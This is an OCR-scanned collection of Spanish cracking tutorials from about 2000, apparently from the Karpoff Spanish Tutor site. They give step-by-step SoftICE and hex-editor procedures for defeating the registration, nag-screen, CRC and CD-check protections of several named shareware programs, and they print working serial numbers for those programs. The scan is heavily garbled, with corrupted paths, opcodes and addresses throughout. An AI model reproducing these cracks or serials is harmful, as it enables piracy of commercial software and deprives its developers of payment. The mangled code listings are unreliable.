vamos paso a paso con f10 hasta llegar a la instrucción je OO4d6ace. veamos qué pasa si ese salto que softice indica se va a 
producir, no se ejecuta. tecleamos r eip (enter) el cursor se desplaza al registro eip y lo llevamos hasta el último dígito (9) 
para teclear b (enter), con lo que obtenemos la dirección de la siguiente instrucción (004d6a9b). 

f5 y ¡toma! no aparece ningún mensaje. parece que hemos conseguido algo. en el título de la ventana principal ya no figuran 
los días que llevamos, ni que se trata de una versión de evaluación. vamos a ayuda/acerca de earmaster 4/ y vemos en la 
pantalla (que es la nag del principio) el nombre y el n* que pusimos. y una duda...si cerramos y volvemos a ejecutar el 
programa, ¿se verán nuestros datos sometidos a las comprobaciones de las rutinas de registro? respuesta: si. es decir, 
volvemos a estar no-registrados, pero los datos introducidos ya han pasado a la carpeta de earmaster en el registro de 
windows. cuando el programa se vuelve a ejecutar, los recupera y los verifica. como comprueba que no son buenos, los 
ignora y se ejecuta en modo “no-registrado”, pero no los borra del registro. 


el plan 


la siguiente tarea es determinar qué es lo que provoca que el salto :004d6a99 7433 je OO4d6ace se produzca. encima del 
salto hay una comparación: :004d6a96 803800  cmp byte ptr [eax], 00 se compara con O el byte que hay donde indica 
eax. si nos fijamos en el trozo de código resaltado de arriba, se ve que eax apunta a lo que hay en 00520d1c. hay que ir a 
softice para mirar esto. volvemos a introducir los datos para registrar y antes de pulsar el botón vamos softice para poner un 
bpx :004d6a84 . salimos de softice; pulsamos el botón para aceptar los datos. aparecemos otra vez en softice. trazamos con 
f10 las cuatro instrucciones que nos separan de la comparación, fijándonos en los valores que van tomando los registros y 
variables implicados. llegamos a la comparación y tenemos que el valor de eax es :005191a8. tecleamos d eax para ver qué 
es lo que hay y aparece que el primer byte es 00. con el ratón cambiamos ese valor en la ventana de datos y ponemos 01. f5 y 
salimos de softice. volvemos a estar registrados. es muy probable que 005191a8 sea "flag city", es decir, donde se guarda la 
variable que controla si somos usuarios registrados o no. ahora hay que ver dónde se inicializa (se le asigna un valor) y 
alterar el código de modo que ese valor sea el que nos convenga. para seguir los movimientos de esa variable vamos a poner 
un bpm 005191a8 w, de modo que cada vez que el programa escriba algo ahí, salte softice. de nuevo ejecutamos ear40.exe 
con el loader y sice se detiene en :004e8724 . 


en w32dasm vemos este trozo de código: 


* possible stringdata ref from code obj ->"serial" 


:004e8705  ba74894e00 mov edx, 004e8974 
:004e870a al170055300 mov eax, dword ptr [00530570] 
:004e870f  ess09dfoff call 00482464 

:004e8714  8b45fc mov eax, dword ptr [ebp-04] 
:004e8717  esb4fcffff call 004e83d0 

:004e871c  8bd8 mov ebx, eax 

:004e871e 881das8915100 mov byte ptr [005191a8], bl 
:004e8724  a0a8915100 mov al, byte ptr [005191a8] 
:004e8729 3401 xor al, 01 

:004e872b  a2a4915100 mov byte ptr [00519144], al 
:004e8730  803da891510000 cmp byte ptr [005191a8], 00 
:004e8737  745b je 004e8794 

:004e8739  8b45fc mov eax, dword ptr [ebp-04] 
:004e873c 8078082d cmp byte ptr [eax+08], 2d 
:004e8740 7516 jne 004e8758 

:004e8742  8d45fc lea eax, dword ptr [ebp-04] 
:004e8745 50 push eax 

:004e8746 b908000000 mov ecx, 00000008 


:004e874b ba01000000 mov edx, 00000001 


:004e8750 8b45fc mov eax, dword ptr [ebp-04] 
:004e8753 es38baflff call 00404190 


en el trozo de código resaltado se ve cómo tras una llamada se mueve a ebx el valor de eax, luego el valor de bl se pasa al 
byte que hay en 005191a8 (sección de datos); el valor de ese byte se pasa a al y se xorea con 01. el resultado se mueve al 
byte en 5191a4. por último se compara el byte en 005191a4 con cero y se ejecuta el salto si da cero. nopear este último salto 
no nos sirve porque debe haber una doble comprobación, debida probablemente a un segundo flag (en 005191a4). lo mejor 
es, por tanto, conseguir que siempre se pase un 01 a 005191a8. esto lo podemos hacer modificando el código en 

:004e871c  8bd8 mov ebx,eax cambiando esta instrucción por: 

:004e871c  b301 mov bl, 01 

primero se prueba en softice (poniendo un bpx en :004e871c, y trazando con f10 cuando se detiene la ejecución, para 
observar lo comentado). para cambiar la instrucción,cuando llegamos a 004e871c tecleamos a eip (enter); mov bl, 01 
(enter, enter); f5 para dejar correr el programa. 

con este cambio conseguimos engañar al programa. en la nag (y en el acerca de) aparecen los datos que pasaron al registro 
cuando cambiamos el salto en :004d6a99.ya no aparece el diálogo para registrarse, ni que es un versión de prueba con los 
días que llevamos, en el encabezado de la ventana principal. 

ahora hay que editar el archivo para que el cambio sea definitivo. para ello vamos al editor hexadecimal. (si no tienes 
experiencia con los editores hexadecimales, consulta mis otros tutoriales, en los que se explica con más detalle cómo hacerlo; 
también tienes un pequeño monográfico sobre el uso básico de hiew, en la página de karpoff). 


la nag 

a pesar de "estar registrados" el programa nos sigue obsequiando con la nag, nada más iniciarse. no, gracias; ya sabemos lo 
que va a poner. ejecutamos el programa desde el cargardor de softice y vamos trazando con f10 desde el principio. supuse 
que no tardaría mucho en dar con ella porque sale justo al principio; y así fue. nos vamos fijando en el código o apuntando 
las "call" por las que pasamos antes de llegar a la que dispara la nag y luego el resto del programa. en este caso la tenemos en 
:00515093. volvemos a ejecutar desde el loader, ponemos un bpx en esa dirección y, cuando para, hacemos click con el ratón 
en el registro eip para cambiar su valor, de modo que este sea ahora el correspondiente a la instrucción siguiente a la llamada 
que nos muestra la nag. enter y f5. et voila! el programa se lo piensa un poquillo antes de iniciarse, pero no aparece la nag. de 
nuevo, hay que editar el archivo con un editor hexadecimal para fijar el cambio. como de costumbre, recomiéndase no 
nopear los cinco octales de la llamada, sino tomar soluciones más seguras como 40 48 90 40 48. 


despedida 

hemos terminado. 

saludos a todos los componentes de tutoriales2000, y especialmente a aquellos que no dudan en echar una mano en cuanto 
pueden. también, a esos que están escribiendo cosas de carácter más teórico y general porque nos ayudan a organizar un poco 


todo el batiburrillo de la información que se va acumulando en nuestras cabezas. 
para lo que queráis, mandad unas líneas a 


f frantice hotmail.com 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: 


Private Pix v2.11 


PROTECCION: Numero de Serie 

DESCRIPCION: Un sharewarecito que te permite tener control de tus imagenes encryptandolas para que 
nadie las pueda ver 

DIFICULTAD: PRINCIPIANTE/AFICIONADO/PROFESIONAL 

DOWNLOAD: http://www tropsoft.com/ 

HERRAMIENTAS: ¡Soft Ice v xx.xx 

CRACKER: 


PrfEsOr X | FECHA: 30/octubre/2000 


introduccion 


hola a todos, otra vez mas aqui con ustedes, ahora con un programita a el cual le 
encontraremos su numero de serie valido usando un break point poco utilizado el 
__vbastrtoansi este se utiliza para los programas hechos en visual basic. 


| crackeando 


bueno amigos empesemos con este memjurgue, lo primero que hay que hacer es configurar el soft ice para que funcionen los 
break points para los programas de visual basic, los pasos a seguir son: 


1.- abrir el winice.dat 


2.- modificar el winice.dat agregando las siguientes lineas coloreadas en verde a su winice.dat 


OO OOTOORÓ examples of sym files that 


can be included if you have the sdk ***** change the path to the appropriate drive and directory 


load=c:¡Wwindowsisystemluser.exe 


load=cXwindowsisystemigdi.exe 


load=cWwindowsisystemikrn1386.exe 


load=c¡Wwindowsisystemimmsystem.dll 


load=c¡Wwindowsisystemiwin386.exe 
load=c¡Wwindowsisystemimsvbvm50.dll 
ee examples of export symbols that can be included ***** change the path to the appropriate drive and directory 
exp=cWwindowsisystemivga.drv 
exp=cWwindowsisystemivga.3gr 
exp=cwindowsisystemisound.drv 
exp=cwindowsisystemimouse.drv 
exp=cwindowsisysteminetware.drv 
exp=cwindowsisystemisystem.drv 
exp=c:lwindowsisystemikeyboard.drv 
exp=cwindowsisystemitoolhelp.dll 
exp=cwindowsisystemishell.dll 
exp=cwindowsisystemicommdlg.dll 
exp=cwindowsisystemiolesvr.dll 
exp=cAwindowsisystemlolecli.dll 
exp=c:lwindowsisystemimmsystem.dll 
exp=cAwindowsisystemiwinoldap.mod 
exp=cwindowslprogman.exe 
exp=cwindowsidrwatson.exe 


ee examples of export symbols that can be included for windows 95 ***** change the path to the appropriate drive and 
directory 


exp=cwindowsisystemlkernel32.dll 
exp=cAwindowsisystemluser32.dll 
exp=cWwindowsisystemigdi32.d1l 
exp=clwindowsisystemicomdlg32.d1l 
exp=cwindowsisystemishell32.dll 
exp=cwindowsisystemiadvapi32.dll 


exp=cXwindowsisystemishell232.dll 


exp=cwindowsisystemicomctl32.dll 

exp=cwindowsisystemiertdll.dll 

exp=cWwindowsisystemiversion.dll 

exp=cWwindowsisysteminetlib32.d1l 

exp=cwindowsisystemimsshrui.dll 

exp=cWwindowsisystemimsvbvm50.dll <direccion donde se encuentra instalada la dll de vbasic 
exp=cWwindowsisystemimsnet32.d1l 

exp=cwindowsisystemimspwl32.d1l 

exp=cWwindowsisystemimpr.dll 


una vez hechos esos cambios en el winice.dat tenemos que reiniciar la pcera para ejecutar de nuevo el softice y que los 
cambios se establescan, ya listo todos los cambios procedemos a la instalacion del programa private pix v 2.11 el cual 
ejecutaremos y la primera ventana que saldra es una en la cual hay que insertar un password " private " el cual nos continuara 
ejecutando el programa, una vez en el private pix, empesamos a analiar y vemos un menu que dice register en la cual 
aparecen dos caption box en las cuales en mi caso insertare: 


Pruvate Pix [tm] Registration 


ya estando ahi! y antes de dar click en register, damos control d para saltar al softice en cual pondremos bpx __vbastrtoansi 
damos enter y despues control d otra vez para regresar al programa y ya estando listo todo, damos click en el boton register y 
saltamos inmediatamente a el softice, caeremos en 


0167: Of0cfd40 c20800 ret 0008 
msvbvm50! _ vbastrtoansi 
0167: Of0cfd43 56 push edi 


A e e A RR AR AR 


despues damos f11, despues f5 y por ultimo f11, lo cual nos mandara al siguiente codigo: 


016: 00452a31 50 push eax < se pone un valor en eax> 


"un "un 


si damos d eax nos saldra en la ventana de datos "" profesor x 
buen camino!!!!:), despues damos f10 dos veces hasta llegar a : 


nuestro nombre ...... Mmmmmmmmamm creo que vamos por 


0167: 00452a37 8bf0 mov esi,eax 


estando ahi vamos a ver los valores de los acumuladores con la instrucción d "acumulador" y cuando mostramos el valor de 
edx vemos que contiene en la direccion de memoria virtual en la ventana de datos: 


O16f: 69f2d4 3941 4242 3337 dncccccniciccininnnnnn a9bb73ed44 


mmmm... vemos ahi un numero sospechoso, pero si vemos una linea mas arriba en la ventana de , vemos nuestro numero 
introducido 11111111 y justo despues a9bb73ed44 mmmm... creo que ese es nuestro serial correcto, lo apuntamos y vamos a 


nuestro objetivo se cumplio pudimos conseguir el serial correcto!!!!. 


nota : cuando quise usar este metodo para los demas sharewarecitos de esa empresa, no me funciono para nada este 
metodo, ya en otros tutoriales les mostrare como se consigue un serial para los demas.....:) 


saludos a to2 los amigos de tutoriales 2000, a txeli, karpoff y skuater.......y a los amigos de el canal del irc hispano +tcrackers. 


aqui va tu mail 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: TNT—-Demian.CrackME .CD-Check. (En) _TNT19 

PROTECCION: CD check. 

Objetivo: Saltarse el CD-Check. 

Descripcion: si no tienes un CD introducido no te deja seguir. 

Dificultad: Facil. 

DOWNLOAD : http: /¿kicekme,toftent/ 

Herramientas: Softice, W32dasm, Editor Hexadecimal, IceDump 

CRACKER: Txotxo FECHA: 5/11/2000 
introduccion 


bueno, para empezar el programa está comprimido/encriptado con telock. el programa mira en todas las 
unidades de cd-rom/cd-rw en busca de los cds introducidos. si alguna de esas unidades no tiene un cd 
introducido, el programa no seguirá hasta que se introduzca el cd. 


al atake 


para empezar, cargamos el icedump. y abrimos el sice. cargamos el programa y el msvbvm60.dll. 
vamos. sabemos que todos los programas de vb comienzan así: 

push XxxxXXxX 

call msvbvm60!thunrtmain 


por ello, ponemos un bpx en thunrtmain. lo ponemos, y nos rompe dentro de la funcion. vamos a ensamblar un ret. con 
el comando a ponemos un ret. y pulsamos f10. ya estamos fuera. 


ahora, usaremos el icedump. ponemos lo siguiente: /pedump 400000 16f0 d:¡icrackme.exe. esto nos creara donde le 
hayamos dicho el programa descomprimido, con todas las importaciones, y perfectamente ejecutable. lo ejecutamos y 
.... Ohhhh. el programa comprueba el crc. es hora de usar el w32dasm. 


abrimos el w32dasm, y buscamos con el string refs, "exe don't have a crc footer". y vamos subiendo hacia arriba 
mirando saltos, comprobando los saltos. no hagais mucho caso a los jge. deberemos llegar a un salto incondicional. 
exactamente 4033be. y vemos que después hay otro jmp. pues vamos a hacer que el salto de 4033be salte a ese otro 


salto y el programa siga. entramos con el sice, y apuntamos los bytes necesarios para partxearlo (e9ad220000). bien, lo 
partxeamos y ejecutamos. y nos pone eso de que introduzcamos el cd. buscamos con el w32dasm el string, y miramos 
un poco mas arriba. y vemos un jnz (404b8c). que por supuesto habrá que partxear para que todo funcione como 
queremos. entramos en el sice, y ponemos un breakpoint en 404b8c, y al romper ponemos un jmp. los bytes que hay 
que poner son los siguientes: e9b200000090. 


y se acabó. ya está. está crackeado. 


bueno, para acabar, quiero mandar saludos a todo el grupo de tutoriales 2000, en especial al profe, karpoff, birkin, 
viper, y a toda esa peña. y a turbop, a ver si crackeas mi crackme txabalote. 


mas información en mi página web:  www.geocities.com/ttxotxo 


y si quereis contactar conmigo: mandarme un mail 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


Karpoff Spanish Tutor 


What is This? v 2.01 (buid 040) 


PROTECCION: Serial 
Objetivo: Conseguir un número de serie válido 
Descripcion: añade información útil a tus ficheros 
Dificultad: Newbie 
DOWNLOAD : http: / /www.jimjams.com 
Herramientas: Softice 4.05, file insPEctor 3.0 
CRACKER: Act Mago FECHA: 01/11/2000 
INTRODUCCION 
introducción 


hola amigos, presento mi noveno tutorial. ya saben, si tienen alguna duda sólo pregúntenlo 
actmagoOhotmail.com , como siempre digo...sólo preguntas referentes a este tutorial y no 


pedidos u otras cosas. en este tutorial seguiremos usando el softice. si no lo tienes instalado 
puedes bajártelo en www.crackstore.com . asumo que tienes conocimientos básicos sobre el 
uso de softice. y para terminar con la intro debo decir : este texto ha sido escrito sólo con 
propósitos educacionales. 


comentario del programa 


añade información variada a tus ficheros'"what ¡is this?" es una pequeña y util extensión 
del sistema. permite almacenar y visualizar extensiones del sistema con facilidad. es fácil de 
usar. tan sólo tienes que hacer clic en el botón derecho para activar los menús contextuales, 
y escoger la opción "what is this?". si la entrada seleccionada tiene una correspondencia en 
la base de datos, la mostrará. 


lo que nos interesa...el programa es shareware, viene con libre uso de 31 días, después de 
este período deberás registrarte o borrar el software de tu computadora. para registrarte 
debes pagar us$20... : ( 


contamos con softice... 


al atake 


quizás acabas de instalar el programa y no sabes como ejecutarlo...debes hacer esto: 


Abrir 
SE Addto archive... 
SE Addto"winamprar” 
Y) Addto Zip 
S Addto winamp.zip 
Hex Edit 
Wihat is This? 


Send To » 


Cortar 

Copiar 
Crear acceso directo 
Eliminar 
Cambiar nombre 


Propiedades 


dale click y el programa analizará el archivo al que le diste click en una ventana como esta... 


ararara DAD. exe 


- CAPrograrm Filesta 


What is This ? 


a CAProgram FilestXaraWXara3D 32 
Size: 1025024 

¡Attributes: ARCHIVE 

Creation Date: 2040900 16:33:27 
Last Update Date: 20/09/00 16:33:28 
l Last Access Date: 28410400 


— Company Name: Xara Ltd. 
(2) MPTOda Ce ame” ASE Ap ¡ABO UT 
File Description: <3D Application 


y 


donde está el cuadrado (insert registrayion key) con bordes rojos debes hacer click para acceder a la 
caja de registro, la que nos pide los siguientes datos... 


user name: 
registration number: 

llenamos la caja con nuestro nombre y serial number al azar, le damos click a ok y como el 
programa no es estúpido por supuesto que no aceptará el número de serie y además no mostrará 


ningún mensaje de registro falso o no válido, pero ...cómo sabemos que no lo ha aceptado? 
respuesta: cerramos el programa, lo volvemos a abrir y vamos a about y veremos esto: 


E is a 2 -Version 2.01 [build 040] 
'S Copyright 1997- 1998 by M.Pacchiarotti + Jimjams. 


= 

[es Home: http: 42m. ji jimjams.com- 

pl] Register online: http: +4 ji jimjams.com?xreg.html 
mailto:marioAjimjams.com - mailto:jimjamsSmclink..it 

54 Used ltems: O 

Te Unregistered E valuation Copy 


hmmm, no nos resultó el registro al azar : ) ... 


a continuación...cerramos what is this? 


debemos recopilar la mayor cantidad de información para saber por donde atacar a este programa y 
para eso utilizaremos el genial file inspector v3.0 el que nos mostrara si está encriptado y también 
en que leguaje está hecho. abrimos file inspector v3.0 ,luego vamos a abrir archivo, y cuando 
hayas abierto el ejecutable wit.exe el que es guardado en x:1windowswit.exe luego le damos click a 
analizar y luego a la lengúeta que dice compilador...se verá así: 


Y -= ile msPEctor v3. D- By VIPER 1 K FOR ] - Released 23/10/00 => 


con la información que tenemos creo que el camino más fácil y limpio será usar nuestro querido 
softice para conseguir un número de serie válido. 


a continuación... cerramos file inspector v3.0. 


usando el softice 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su 
uso. 


a continuación...abrimos what is this? y vamos directamente a la caja de registro en donde 
introducimos nuestro nombre y cualquier número de serie . todavía no damos click en ok ; lo que 
ahora debemos hacer es presionar control+d para que salte el softice y así poder colocar nuestro 
breakpoint. 

ya estamos dentro del softice...colocamos bpx hmemcpy y presionamos enter, luego presionamos 
f5 para salir del softice. ahora le damos click a register y si todo sale bien el bpx debería picar y hace 
Saltar al softice. 


luego presionamos f11 1 vez --------- > f12 11 veces, ponemos bc * para quitar el bpx y estaremos 
aquí: 


015f: 0044fa58 8b55f0 mov edx,[ebp-10] 
luego f1O 20 veces para llegar aquí: 


015: 0044faal1 8b45fc mov eax, [ebp-04] --------- > si aquí colocamos d edx veremos nuestro 
nombre. 


luego f10 1 vez para llegar aquí: 

015f: 0044faa4 8b533c mov edx, [ebx+3c] 

si aquí colocamos d edx nuevamente veremos nuestro nombre y si colocamos d eax veremos esto: 
069495908567 

ya lo hemos conseguido, pero... cómo estar seguros? 

podemos darle a Ff1O 1 vez para llegar aquí: 

015f: 0044faa7 e80c43fbff call 0O403db8 ----------- > d edx = 1233321 . d eax = 069495908567 
aquí colocamos f8 para entrar en la call, se verá así: 

015f: 00403db8 53 push ebx ----------- > d eax = 069495908567 . d edx = 1233321 

y para dejar de dudar presionamos f10 5 veces para llegar aquí: 

015: 00403dbf 39d0 cmp eax, edx 

hey !! en está comparación dejaremos de dudar. colocamos d eax y veremos esto: 
069495908567 -------- > nuestro número de registro válido 

y si colocamos d edx veremos esto: 

1233321 -------- > nuestro número falso 

creo que ya lo hemos hecho, en mi caso la caja de registro quedaría así: 


user name: act mago 


registration number: 069495908567 


damos click en ok, cerramos el programa, lo vovemos a ejecutar y vamos a about y veremos esto: 


y EF A ABD 1 
2 Méhat is This ? - Version 2.01 [build 040] 
ES 9 Copyright 1997-1998 by M.Pacchiarotti - Jimjams 
ds Home: http: + kw jimjams.com 
pul Register online: http: +4wwmwww jimjams. comexreg.htrol 
y mailto:marioMjimiams. com - mailto: jimjamsEmclink. it 
E Used Items: O 


o 2 Registered to: £ct MaglO 


programa crackeado... fácil no? 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. actmagoOhotmail.com 


saludos 


saludos a Einticrack!Hteam! ( saludos a xasx, no parare : ) ) 
saludos a dek_oin. 

saludos a viper, por el genial file inspector. 

saludos a toda la people de tutoriales2000. saludos a profesor x. 


saludos al l.d.a. (monofeo (gran amigo), flaco (te pillaron! , jaja!!), chirda, taza, afo, 
solerman, nasal, peter y a todos los demás) 


saludos a todos los crackers del mundo. 


chao !! 

espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, 
pero recuerden, 

lean muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


actmago 2000 "aquí no hay pausas" 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Tetfun 2000v1.1/5, Colorfun y jBall 


Programa: 


PROTECCION: Serial 


Descripcion: Clon del tetris y otros juegos. 
Dificultad: Facilucha 

DOWNLOAD: http://jaibosoft.8m.com 
Herramientas: Softice 


CRACKER: Yerba Mate N* 9 FECHA: ../11/2000 


INTRODUCCION 


En esta oportunidad vamos a pensar un rato juntos. El programador hizo las cosas de forma tal que por más 
que busquemos el los registros, nunca veremos el serial completo. El programa está bien logrado y el precio 
que pide por el, teniendo incluidas todas las posteriores actualizaciones, es realmente accesible. Donde estuvo 
levemente mezquino es en dejarnos probarlo solamente 7 días. Como siempre la única razón de este tutorial 


es analizar su protección, distinta a la que hemos visto hasta la fecha. No te preocupes por la versión que 
consigas. En principio este tutorial está escrito para la v1.1 pero también analizaremos la versión 1.5 (distinta 
por cierto). Al final como es costumbre te dejaré para que practiques, un programa con el esquema de 
protección de la versión1.1 y otro con el de la última versión. Espero que lo disfrutes. 


AL ATAKE | 


dí con este programa a travez de un amigo, que lo había sacado del cd de una revista. en concreto se trataba de la versión 
1.1, digo trataba porque ahora la versión que vas a encontrar en la página del autor es la 1.5.( no te preocupes que al final le 
dedicaré algunas líneas a esa versión ). vamos, como es costumbre, a ir recorriendo juntos el sistema de protección y tal vez 
(como me pasó a mí) veas algo distinto. 

como de costumbre vamos a register e introducimos nombre y serial ( en mi caso yerba mate y 12345678) 


esta vez dejo que te copies mi serial ;-). si ponés el tuyo tratá de no repetir números, ya verás por que. a lo nuestro, ponemos 
un bpx hmemcpy y presionamos register. el soft-ice entra en algún lugar del user. borramos el breakpoint que ya cumplió su 
función con be*. como el user no es la sección que nos interesa vamos presionando f12 hasta llegar a la parte en que checkea 
nuestro serial. esto es unas 13 veces. hecho esto llegaremos aquí: 


:0040436b esddcf0200 call 0043134d 


:00404370 8b9684000000 mov edx, dword ptr [esi+00000084] pone en edx 12345678 
:00404376 8dbe84000000 lea edi, dword ptr [esi+00000084] 

:0040437c 83741808 cmp dword ptr [edx-08], 00000008 compara el largo del serial con 8 
:00404380 744b jz 004043cd salta 


cuando introducimos el código falso no sabíamos nada del verdadero. ahora sabemos que el largo del serial tiene que ser 
igual a 8 caracteres. por que digo esto?. porque si no salta, cuando llegues al call 4364ab sale el mensaje de error. como de 
casualidad el largo es igual a 8 no tendremos problema y saltará.seguimos avanzando con f10 hasta llegar aquí: 


:004043d4 8a0411 mov al, byte ptr [ecx+edx] 

:004043d7 3c30 cmp al, 30 compara con O 
:004043d9 7426 jz 00404401 

:004043db 3c31 cmp al, 31 con 1 
:004043dd 7422 jz 00404401 

:004043df 3032 cmp al, 32 con 2 
:004043e1 741e Jz 00404401 

:004043e3 3033 cmp al, 33 con 3 
:004043e5 74la jz 00404401 

:004043e7 3034 cmp al, 34 con 4 
:004043e9 7416 Jz 00404401 

:004043eb 3035 cmp al, 35 con 5 
:004043ed 7412 jz 00404401 

:004043ef 3036 cmp al, 36 con 6 
:004043f1 740e jz 00404401 

:004043f3 3c37 cmp al, 37 con7 
:004043f5 740a jz 00404401 

:004043f7 3c38 cmp  al,38 con 8 
:004043f9 7406 Jz 00404401 

:004043fb 3039 cmp al, 39 con 9 
:004043fd 7402 Jz 00404401 

:004043ff 33db xor ebx, ebx 

:00404401 41 inc ecx 

:00404402 831908 cmp  ecx, 00000008 vuelve arriba hasta 
:00404405 7Tccd jl 004043d4 completar los 8 caracteres 


todo esto sirve para verificar que los caracteres del serial sean números. ( cada loco con su tema ;-) ). seguimos juntando 
pistas, ahora sabemos que el serial esta compuesto por 8 números. inmediatamente después se fija que nuestro nombre esté 
comprendido entre 3 y 256 caracteres (no muy difícil de acertar). 


no te voy a aburrir con más detalles. vamos al grano. el programa ahora toma nuestro serial (12345678), lo parte en cuatro 


números de dos cifras y en principio lo pone en el edx. canentá y elongá bien el dedo índice y sacudile duro a £10 hasta 
alcanzar la dirección xxxx:004045a3 


:004045a3 8b542414 mov edx, dword ptr [esp+14] d edx 


allí se pone en edx lo anteriormente dicho. presionamos f10 una vez para que pase el valor a edx si hacemos dedx veremos 
la siguiente tablita de valores: 


seguimos trazando con f10 hasta llegar a ver lo siguiente. 


:004045cb e870020000 call 00404840 llamada a la rutina de comprobación 
:004045d0 85c0 test eax, eax test 
:004045d2 7539 jne 0040460d salto condicional 


no te desesperes que ya falta poco ;-) . una vez que llegamos a 4045cb pulsamos f$ para meternos dentro de el call. una vez 
ahí veremos lo siguiente: 


200404840 82442404 mov al, byte ptr [esp+04] pone Oc en al Oc en hexa = 12 en decimal 
:00404844 8a4c2410 mov cl, byte ptr [esp+10] 4e en cl 4e en hexa = 78 en decimal 
:00404848 8a54240c mov dl, byte ptr [esp+0c] 38 en dl 38 en hexa = 56 en decimal 
:0040484c 53 push ebx 

:0040484d 8aSc240c mov bl, byte ptr [esp+0c] 22 en bl 22 en hexa =34 en decimal 
:00404851 3c46 cmp al, 46 compara los dos primeros números de nuestro serial con 70 (46 en hexa) 
:00404853 7518 jnz 0040486d 

:00404855 80fb25 cmp bl, 25 3 y 40 con  37(25 en hexa) 
:00404858 7513 jnz 0040486d 

:0040485a SOfa41 cmp dl, 41 Sy 6 con 65 (41 en hexa) 
:0040485d 750e jnz 0040486d 

:0040485f 801922 cmp cl, 22 Ty8 con 34 (22 en hexa) 
:00404862 7509 jnz 0040486d 

:00404864 b801000000 mov eax, 00000001 

:00404869 Sb pop ebx 

:0040486a c21000 ret 0010 


si cualquiera de las comparaciones anteriores no es igual pasa al siguiente grupo de comparaciones 


:0040486d 3c50 cmp al, 50 1? y 22 con 80 (50 en hexa) 
:0040486f 7518 ¡nz 00404889 

:00404871 SOfb0e cmp bl, 0e 3 y 40 con 14 (Oe en hexa) 
:00404874 7513 jnz 00404889 

:00404876 sOfaS9 cmp dl, 59 S” y 6 con 89 (59 en hexa) 
:00404879 750e jnz 00404889 

:0040487b S0f958 cmp cl, 58 Ty8 con 88 (58 en hexa) 
:0040487e 7509 jnz 00404889 

:00404880 b801000000 mov eax, 00000001 

:00404885 Sb pop ebx 

:00404886 c21000 ret 0010 


y así sucesivamente unas 112 veces mas 


el gráfico habla por sí solo. el programa toma nuestro falso serial (12345678), lo fracciona en cuatro (12-34-56-78) y lo carga 
en los registros (al-bl-dl-cl). luego realiza la comparación de los registros con números fijos (hardcoded). al principio te decía 
que no repitieras los números dentro del serial, si por ejemplo elegías poner 88888888 no te podrías dar cuenta que parte del 
serial compara. si no conté mal hay 112 rutinas de comparación, es decir 112 seriales distintos que funcionarán. en la 
pantalla del soft-ice de arriba vemos dos de las rutinas de comprobación que corresponden a los números 70376534 y 
80148988 te dejo el resto a vos para que los pruebes. para poder probar más de uno, una vez que está registrado, ejecutá el 
regedit (desde el menú inicio) y buscá en local machine/software/ jaibo/registration, tus datos. borralos y estarás sin registrar 
nuevamente. 


una cosa más las comparaciones son fijas (no son producto de operaciones) que quiere decir esto? oooooocccicnono connooncnnnos 
exacto, que el nombre no es utilizado en lo más mínimo en la rutina de comprobación. cualquier número de serie funcionará 
con cualquier nombre. 


E O O O O O OI 


actualización para la versión 1.5 ....... 


E ó como hacerle la vida más fácil al cracker!!! 5-) 


en principio es igual, solo difieren las direcciones. por si, haciendo una búsqueda en la web no conseguís la versión anterior, 


[te voy a dar las posiciones de memoria del soft-ice para que lo puedas seguir. el siguiente cuadro adapta lo visto para la 
¡versión 1.1 a la actual versión 1.5 


versión 1.1 versión 1.5 


0040436b 0040461b 


004043d4 mov 00404684 mov 
004045cb call 0040487b call 


en esta versión, el programa vuelve a fraccionar el serial, pero más tarde lo vuelve a reconstruir (¿?) como ya veremos. 
vamos a la posición 40487b: 


:0040487b e870020000 call 00404af0 llamada a la rutina de comprobación 
:00404880 85c0 test eax, eax 
:00404882 7539 jnz 004048bd 


hasta aquí todo similar a la versión anterior. el cambio se produce dentro del call 40487b. entonces f8 y entramos. vamos 
pulsando f10 hasta llegar a 


:00404b7d 8d44240c lea eax, dword ptr [esp+0c] aquí reconstruye nuestro serial 


seguimos presionando f10 hasta llegar aquí: 


:00404b8a 3d56dc3104 cmp eax, 0431dc56 compara 12345678 con 70376534 
:00404b8f 7529 jnz 00404bba si no es igual pasa a la siguiente comprobación 
:00404b91 8d4c2408 lea ecx, dword ptr [esp+08] 

:00404b95 c744241cffffffff mov [esp+1c], fEfFEfFf 

:00404b9d  es98ef0400 call 00453b3a 

:00404ba2 b801000000 mov eax, 00000001 

:00404ba7 8b4c2414 mov ecx, dword ptr [esp+14] 

:00404bab  64890d00000000 mov dword ptr fs:[00000000], ecx 

:00404bb2 Sf pop edi 

:00404bb3 Se pop esi 

:00404bb4  83c418 add esp, 00000018 

:00404bb7  c21000 ret 0010 

:00404bba  3dfcf9c604 cmp eax, O4c6f9fc compara 12345678 con 80148988 
:00404bbf 7529 jnz 00404bea si no es igual pasa a la siguiente comprobación 


te suenan estos números, seguro que sí, son los mismos seriales válidos que antes. si en la posición 404b8a haces ?eax 
obtendrás bc614e que no es otra cosa que 12345678 en hexadecimal. asimismo 0431dc56 es 70376534. al igual que antes 
tendras más de 100 seriales válidos. la diferencia esta en que son mucho más fáciles de encontrar ahora que en la versión 
anterior. 


ahora te toca a vos: (la estabas extrañando, no) con la misma técnica que la usada hasta aquí, tenes que encontrar los 
seriales de colorfun v1.0 y de jball v1.0 . ambos programas los podrás bajar de la misma página que tetfun. en el caso de 
jball la protección es similar a la de la versión vieja del tetfun, mientras que en el caso de colorfun es del tipo de la nueva. 


por dudas o consultas comunicate a http://yerbamatearO yahoo.com 


espero que este tutorial te haya sido útil, nos vemos en el próximo 


yerba mate 


' todo es fácil cuando se sabe como' 


importante: lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, no como robar alguna 
propiedad. si vas a usar este programa debes comprarlo. si no fuera por los programadores de shareware no tendríamos con 
que entretenernos. 


